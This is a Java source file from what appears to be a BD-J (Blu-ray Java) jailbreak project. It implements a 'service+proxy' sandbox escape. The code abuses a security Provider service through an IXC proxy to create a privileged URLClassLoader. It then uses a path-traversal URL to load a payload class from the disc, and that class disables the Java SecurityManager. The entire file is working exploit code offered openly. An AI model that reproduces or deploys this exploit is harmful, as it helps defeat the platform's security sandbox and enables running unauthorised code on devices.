/* * Copyright (C) 2021 Andy Nguyen * * This software may be modified and distributed under the terms * of the MIT license. See the LICENSE file for details. */ package com.bdjb.exploit.sandbox; import java.io.FileOutputStream; import java.io.InputStream; import java.io.OutputStream; import java.net.URL; import java.net.URLClassLoader; import java.security.Provider; import java.security.Security; /** Implementation of the service+proxy exploit. */ public class ExploitServiceProxyImpl implements ExploitSandboxInterface { private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service"; private static final String NEW_INSTANCE_METHOD_NAME = "newInstance"; private static final String NEW_INSTANCE_METHOD_SIGNATURE = "(Ljava/lang/Object;)Ljava/lang/Object;"; private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload"; private static final String JAR_URL = "file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar"; public boolean trigger() throws Exception { // Throw exception if class does not exist. Class.forName(SERVICE_CLASS_NAME); IxcProxyImpl proxy = IxcProxyImpl.getInstance(); // Prepare service object with the class to be instantiated. Provider[] providers = Security.getProviders(); ServiceImpl service = new ServiceImpl( providers[0], "exploit", "exploit", URLClassLoader.class.getName(), null, null); ProviderAccessorImpl providerAccessor = new ProviderAccessorImpl(providers); providerAccessor.putService(providers[0], service); providerAccessor.setProviderAccessor(); // Instantiate the URLClassLoader class with privileges and a vulnerable path. URL[] urls = new URL[] {new URL(JAR_URL)}; URLClassLoader urlClassLoader = (URLClassLoader) proxy.invokeMethod( service, NEW_INSTANCE_METHOD_NAME, NEW_INSTANCE_METHOD_SIGNATURE, new Object[] {urls}); // Instantiate the payload class with all permissions to disable the security manager. Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME); payloadClass.newInstance(); return System.getSecurityManager() == null; } }